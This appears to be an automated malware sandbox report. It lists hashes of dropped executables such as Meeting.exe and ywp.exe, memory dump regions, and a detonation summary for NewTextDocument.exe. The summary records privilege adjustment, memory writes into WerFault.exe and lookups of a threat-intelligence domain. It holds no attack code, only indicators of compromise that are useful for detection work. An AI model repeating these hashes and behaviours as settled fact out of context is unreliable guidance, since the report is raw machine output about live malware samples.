
MD5 0e5aa5543d83072489f9db5d6996a3c4
SHA1 01b3869d0b27fa5b33621951aa429465feffc16b
SHA256 4410d62b79720e61d4889b560e4c32a47a3cabe2c7fcb3e91b890470ce76ec79
SHA512 e5b08f9b2cf71920ec2f07f6beaf8df64f93afc752b4ff5e830ea907606e35ff64f683d4b1a64b9c5f70e81f7e56d6af1962a398d68efb90050580be37191444

C:\Users\Admin\AppData\Local\Temp\a\Meeting.exe

MD5 1ebcc328f7d1da17041835b0a960e1fa
SHA1 adf1fe6df61d59ca7ac6232de6ed3c07d6656a8c
SHA256 6779bc4c64850150de694166f4b215ce25bbaca7d60b293fa7bb65e6bdecbc1a
SHA512 0c537e8dbdf5de433f862a31fbcb5a709f7727783cb36f7ed3dcac1acb44d704d5ad570035259022b46a0370754d029f476ae40280983d1586de9098e31a31d6

C:\Users\Admin\AppData\Local\Temp\a\ywp.exe

MD5 6a9213568bc6a19895240ff14fd57329
SHA1 bd18494cb4d7f652bcf9ce187e11ed0eccda65f8
SHA256 5618de81f0a47570c7048019102af4664a7402b657dcc060148243e97159ad97
SHA512 d6c658c22dd0e70f09c0a3d07b656ea6315c39a99bd7855f202447f88359272efdc8cfba17b5243b26fac69b5159ce2cec106f42df22bdb72f948c4f9618335d

memory/7052-23517-0x0000000000750000-0x0000000000C0A000-memory.dmp

memory/6820-23521-0x0000000000400000-0x0000000000480000-memory.dmp

memory/7052-23523-0x0000000000750000-0x0000000000C0A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 cd646216ed7eab2218d1e185722eed94
SHA1 cb3918010a4dbfd5aae4a290dcba7ef40c397cd8
SHA256 68092f16e2a53ced0a0fa8b934fbf49e16b9eabeaba096378f2ad6a502b50efb
SHA512 580f4ea6e55ab124e77a1dcf022ced4abbbb805046b84dcabe9cb2bde38c4014f068c125a4b88cccb09108d9b0d5e52acd1e04d09bdff6959ef661c30267f0f0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\122f7b64-79c8-421c-a1f0-a2ea5d540941.dmp

MD5 d67f2c76d795758fb49a947f79c85d92
SHA1 cbcb3a6673d772f33d6431c11e3ca069bd240360
SHA256 76c3d52a2b25c90894cb2a0655b2e7bde946abc7f2fc498e1a0c25407cdd5fb8
SHA512 96fe7cde3e2114ab5893261cf77745ede1197aa71180368cc70b663882510e56e47585ec370913a966f5f7204dd4a9b5e13a06e7be0d4445a37513a7bc66e80f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 c7a9e5380d253a54d98cdc7e3301a402
SHA1 c83bef06d501e466dea225e1040fb135b8143d6e
SHA256 7fab1901508200609896981bd137b470e6fce24fd460c9fbaf75b7e574ea2856
SHA512 06946fb9a435a2c9c380ae385b1b76f88a3d15faf7c6f8fd3e8a9f6ef95e48fef020422ed1a3c0a0572954258835f0ee11fb98f60e2e72aea48b1ce177df8077

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\9be57386-9232-4932-b4b7-aa7cdd47eee8.dmp

MD5 dc0525570780e0c2baed250c7d5ff899
SHA1 0d5c5d4998a3323c0b8ecbdd8f2c12c78af4b291
SHA256 703cb92b79b4034f9d657ad385cbf23872e2683a8f23915bd816dfa17c76ca30
SHA512 6aac232ca699f72e119be02698556551a681c1dad700a1b25896541d027be82e327244578d14fc6677335d3ca423cac1f72670a6f140038ef0206ea1af043b8a

memory/5292-23575-0x0000000000400000-0x0000000000442000-memory.dmp

memory/5292-23576-0x00000000059A0000-0x0000000005A06000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 577f258414da82354c5a879615202791
SHA1 bcbf5331866cc86b0020870b8ddae017a7859a4e
SHA256 0f4d5e866484c7da7c31425ceafc1fd0dfb88efcaa43357d6e409802d85589a8
SHA512 d2882324bc5f1814352d056d74bdf58bc37d3bc96e5ecce981c12de7b7d05c5cfa756baf686a44de0e2eb08d61c19412e0b36f130194c4d1e44312d836b5f17f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\fb559c99-5e3e-434d-a5cf-8c8bbc263a83.dmp

MD5 3c427b0efc569efb57467dd5f13b0e48
SHA1 9f07141589aea57dc03b03867685742199f485b6
SHA256 cc4317afa9c1367a4ab57390f9154a49ac75f4389dc714ef7e5232f4ac44dfca
SHA512 1e0e9e9452e77083cf644d95370dc71a835d5baaf26d3a824b0e9d930df7b7cd023a9e1ec0f5abd437256320787f2b5d3f2b901c393abdef4d43c6fde6bb54a1

memory/38128-23600-0x0000000000400000-0x0000000000440000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 a2db3a57f248a8dfec0e78966f08ffa1
SHA1 39292dfca1b3812e31d7d1c760c46dd556ec5279
SHA256 097b3bb8f664f60cdf0bff42acb905e1cc695fa42c10e5f00ce0104ef4c59af7
SHA512 3155cbb9c5a8d6d12def5a6a90d79197122e141b0e6b6f7d199a6b1826885707fb950d016d5d62af35fbd08bd707c93f5b9ca610fa262236a54b67914e3b9d3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\c57f71f3-2501-4ece-8d7c-8cf2cfdab5f0.dmp

MD5 8011738caa28ce9763e27b98a6acfdb1
SHA1 afa577394ee342ee1d172ef77268d3ef7b22613f
SHA256 3623b5f9fa6e9a626bf23dc8bdf29646a1490c397314cd6f6df14348419bf3d3
SHA512 1262335ccd9583d4fc1cd576b727e126ca9df93fbdc898b20b8445a2bff354435419468b0308bcf12bc464cde76eb9a35dc7188c65fa3c56f36ca32bdeb85814

memory/38128-23625-0x00000000068C0000-0x0000000006910000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 014427bd9d2e47455a6293179bbeb8e4
SHA1 73021cec7d4719953b27fa21739799cfeeb65ff9
SHA256 f4fdd86f608c735bd5ecdba8565f84c13c18be28c5d4cd712181608bd1fc5af1
SHA512 1be1c0fdeca5720c0c6f6de9d2bf36e5a60836fd32b986f0e9b0f6f69996844eaa2c769f58158cae49f91856e39bbf1a585575d6a2786794b586d0b9409513ec

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\b22cd904-c946-42fb-9971-a99937926136.dmp

MD5 651124b6683d012a3ef5e8377c64d02e
SHA1 367a82dbaa18f72de73315760a77a285f72295c7
SHA256 e0897386405fcd1471246a26f07bf3e0f6f97c66759f1b37cc3e01f8009cddac
SHA512 531f4f91d6423fe88674bb7fd7023ad0fb5737f50ac53125f23b596d10b3fa22f0d350d623cbb66b40706a031e29b16bd11e41cccdbf4870c09c2566adca2ee8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\bf094322-3cc5-41e8-80fb-a139aaca695c.dmp

MD5 7a7baaad01344fd9f803f4309d9ea87b
SHA1 fa1d7d529f0f2ae02e76bd7558d31eaf6ecf48f7
SHA256 d8832e78000c9484bb082861f8f5c9f553b34a029fbdd156c5348bab5556b1b7
SHA512 258b224366593e3132648c102f8ef8e2e06fb1db44d2e1837e78f3c8b65043eff4e5dadf963b27b43620d0769dbb287845aa6d34e2c29ee9347f014ace459d5c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 90fa1a686687a5587622763d0f273101
SHA1 b79b7f380b8a4e06d1cb1e0d837ae44ab99d3868
SHA256 248368c0386032a211e40d2b309f3f543407e0d16d6c0514b98449294dac363d
SHA512 92c4e993f59cbfffe43145364c2b1bb4b1d309b2082a7e0155a7d82c39261e9cce2971abd27fc7ffadab05f8ef780c3593ec4d779929d9a812980587ed8bbdaf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 bd3363e61dc57d1d078ebd3ea4f5841e
SHA1 4e8fa246140ac15aeb19af365c5ea2b70475d941
SHA256 60eafcbcda7bed0cf3ac85ee57dae96d09e0ccff1c8885090380a42e24d62c4c
SHA512 e78b3b8a1c2b6c759cee1be8ea8d0d2e95b61ee678e33b6f946cb1626a5c5b05d2b62797ada4f14f8e3579fb4bf336e4da50bdede610cee028b8592b16029ce1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\f9cbdce3-c4af-4f4c-85e6-01ab691ff937.dmp

MD5 ff5954062dfd36d866e59b486d1791c0
SHA1 8d0a3d206b4bd1ac052654ce47dd406fbe9a09bd
SHA256 13f6c58ff5a3158f539166b1083181e3dd8ccc0c19465db7b5418eb07d27aff7
SHA512 553d585e78a3c40a2491ad9874f116dcb2c82225ab9df6dfc7aafef851580f56f5b0a108ec45bae08b50724ee315409a65d6526ee2181c4e31794b8f0fae0757

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 67c30ea6aa5b69517ff34a2ccdf05e76
SHA1 3c57a24fcee7d9146fecb72322b8b2db2da651d2
SHA256 3b2f767462d3319a183de77101f7eb9a10dc8bc19679fa6415cca855bcf117c0
SHA512 2779d2ef892743db4cedee7cf9321886ddf6482dfac3fd35cd78fe6aeb9476f69febabb424a10363e0a6e26cfed806397cbea058530e47c22fc3d54cd70fd665

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\fab1ee35-5747-4802-a31e-3414c56e045d.dmp

MD5 4332a7269dbc3f1cf2634ee8b719abfa
SHA1 21e8ac4515578b3e0ffb552d1fd1a72f4baaa878
SHA256 5c50268804f19b7e30a84a9a8ddc2234593aafb6d2a4e67871004dae3c2cb090
SHA512 ffce3993b55f3b73164624a63652dc4998ceb2283ea450569825586a70c453472a8251e90211e33b2848a8a740f1dadc6eca546639cc420549ce50e57164deb0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 c47bc2d7130f883efffa79894e896808
SHA1 5c3ee91e64fc2e5123641113d94800070e00d382
SHA256 011c2f1096d821fb89cec320780582645fdf1df0632b9c7959b3a31be8581300
SHA512 60d2512f5136d08ca6b683195bd21403c6349ead621be6810eb2fdadc07bc9b5597ed50cc7fef1003584ea53466e5c073b63bdbde34ff82ec6031571bfe9524e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\ae39179b-5ca6-45d0-8db7-293ac34ee66c.dmp

MD5 46aa61c6331b14a41310b652ce9ae65c
SHA1 48bf5a9cf925185d88b8fc8f611d6664c88027bb
SHA256 38a85a4f5a84e752f0bd49bf8287e4a3dd549fbeeff27f157e876bfa1837f2c2
SHA512 905882c49619f5a158054a57234cc1569c3ec277f24e56fe0f8be5df8e28b69defcbaf3999b1f8027463155b9fd40ff4acb279122cc4db62aa086871c8aa04b4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\cce53f9a-184c-459e-8e1c-db7624f0abd2.dmp

MD5 5828740be4e132bb4e49abf5dfe41a73
SHA1 464f02483aed1587157a489b51e715ae96767133
SHA256 d77faefa98ee6cc8d1e9019c5a9f787afc71afb1e733809e21a4f45696a1bfab
SHA512 433fd188562568dd14dbb7a5c491222113854c509a8f188ef142aa9ee4b2977447b577d38224ce73ffe2b3c0ec2039825f670573e18dbd073e63a2ace32c761d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\78958706-0afe-47e5-bf8a-eb9e86451fb3.dmp

MD5 9427aca6e2f69b2fe7de6cc560efca95
SHA1 23d62f4f7a6d3451e39207826e2eef5113eb5c2c
SHA256 bbc95bb301a8249196543594ea3d29b68df762aea4fcd79b0051b13f38a89111
SHA512 ec7ea1691c9439518b63ed14ecc63bb7d28f5d1dba3fc399a856eb5a3e74e74cb4e7022e20b47f4bad36752f66d8502a0619804c651abbba802e4a20f7f3d689

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 fc88e25223f131ad995e0107d034f019
SHA1 f2d6a078e52ab5ae14cc6ae0cc577aec6225ac48
SHA256 b6d0c8771633ea1f819b68e946ec7162049d9f37a660c1130fb5f63bc2b9a38b
SHA512 c17e56216de345839d4c17d4f2cbacdf727b9b6fea70df1a7869519c9d9a4b607dbb6536afaa17228ed54448b5b8a6312ca9f4d3431d51f36a7f58e6c94045a0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\9f9d6f1b-9fe9-4368-bc55-bacc01ee17ee.dmp

MD5 2f9e79eb31e1ea8575377b3d2e7b8b74
SHA1 b8cd3a09993e154d4c7a0c1df15bdb65bfe6be69
SHA256 30e2f71d335c6f826958a24b50ee10cc88a636ee097429c5d00a216ea230818b
SHA512 5eba9f20d3cd34eada849736023bd92b54df347604943184cdcc541ffd006c8e1c5274b9a21aa7ab6ddd3e9aed4768125265444e29e613494b6dff29d3220637

C:\Users\Admin\AppData\Local\Programs\PCV Convert Manager\pdfconv.exe

MD5 7366d8ddcc9fb6721c53f5feef334b1e
SHA1 91f437cf6b6dd98da5ccbb543020b5e6f1f30f27
SHA256 b3b91381d1df6f08d06ac4f74bca4e597b596001966cee4bc4401a46f1b318b0
SHA512 41990b1d6338bdd865f5f3f0915fd85ca3d165d27ca4d2f85e2def8d27d3363a28387689a3d1e4bb3b581ca71b0c2dc62cd54bf9e99537750d2f934ddfb81de1

memory/7976-23852-0x0000000072B10000-0x0000000072B95000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 10959b6a0c0e7ce577fd1db64d28816f
SHA1 382c8ac8918c3a8d3d9652dc2bb0290fe895c3e4
SHA256 db5c2b1ec219ed31e06912f7b39cab934a97a3273acb892a0f05af0fcfeb30a4
SHA512 34f348f499d88d5174655445bda34a312bcfdac5225df726b8c34748538c61c712934d2ae70dd5415356de37abcf93c589314b23d57d194ec4f1cfe400938c73

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\b40b8069-2f59-4245-9284-1ff402cca15d.dmp

MD5 f0494eb4c0e651bbbc940db2638e8d50
SHA1 e5fa54cadd0fb77e4c01954f204aaba0606a32ca
SHA256 a9cdd7fac0671e86762b5d632ca9d2dd1b1e7c186ad3eab25dda02a9a2b1650f
SHA512 65d91d43b1776470c32aa492a534cf4f3e0561cb4355560e4156ac328c760b7146443dc03d7b8d4e0feb50c0c7b693376a9fe8420ce5baafd74badd5717b1dc2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\64e64cb7-b577-4383-9913-07b5e6b8f851.dmp

MD5 29f54c94ad9b63b217bfdb7e798ead28
SHA1 08c88288d2678610890ed3d7ac9d2c3f4727f26a
SHA256 f6719c2ad11e68c1d968cccbbad9a5aac5c7bc5b74c1e1ca48a84442e30e45fe
SHA512 7061c6b908451a8d534fd8d72aadd322de958956fe8931889f7ac1b270f6d800cfc885418c9006b7aa117cb6114ea7598ce502d582e0b1f27fb4377aadca87ea

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\ecdcb9dc-41cc-4960-a71e-28ea37e6d02c.dmp

MD5 57954eb38b0e7c8d7007c8f69258a396
SHA1 4bcbdab9df0a0bb032a1313c0c532ab84ab8eeb9
SHA256 049db39d75c9e6c4470c24e2d91d4e7ebf45930467d963d1c0182335bf09d9b9
SHA512 997d52a1e5e9daae01c52de2a48c966a441b577272bbcfb1a7d81a972dbc971553ef0383aba1dca5f41eb1b9dd789000fa784068dee8b24a9a09d819a4a1957a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 ada00df8ebf29423ac944b873fa69b05
SHA1 54eaf75a8c7362592bbcf5f670b52c404126312c
SHA256 5ce5cc8beb2bd727cea4a2ede74b7cf54eebd7f095e2a648af7340dd64cbb6aa
SHA512 338a39e1c6419e2df056c7f5ae401d278ed54f3d371216f61f933bd06f8009eddf50f5cca048877681fe005f271812890c51bb6ee7651e7cab9b402428a6929f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\840a6147-08b4-47b8-bfa1-2668b8341da9.dmp

MD5 e6bd8559d40afd0962a56eaf5ab9f8cf
SHA1 d21e25372d868c3f5312da6bd87a8b23766de809
SHA256 42a9ecfa2f0be150d0eb7825ced03bd078858f45047cbedb539ab2b45686137e
SHA512 95968f027b1cc9dfefd4632ef1652c44049b93503fd5c018b5945883e63ab9562bb3ff707c7eca9acc8a38ac38cc104b587663a0b525f8385c5da6be70ef96be

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-09 08:54

Reported

2024-09-09 08:56

Platform

win7-20240903-en

Max time kernel

122s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2540 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe C:\Windows\system32\WerFault.exe
PID 2540 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe C:\Windows\system32\WerFault.exe
PID 2540 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe C:\Windows\system32\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe

"C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2540 -s 1076

Network

Country Destination Domain Proto
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.66.49:443 urlhaus.abuse.ch tcp

Files

memory/2540-0-0x000007FEF6263000-0x000007FEF6264000-memory.dmp

memory/2540-1-0x0000000000F30000-0x0000000000F38000-memory.dmp

memory/2540-2-0x000007FEF6260000-0x000007FEF6C4C000-memory.dmp

memory/2540-3-0x000007FEF6263000-0x000007FEF6264000-memory.dmp

memory/2540-4-0x000007FEF6260000-0x000007FEF6C4C000-memory.dmp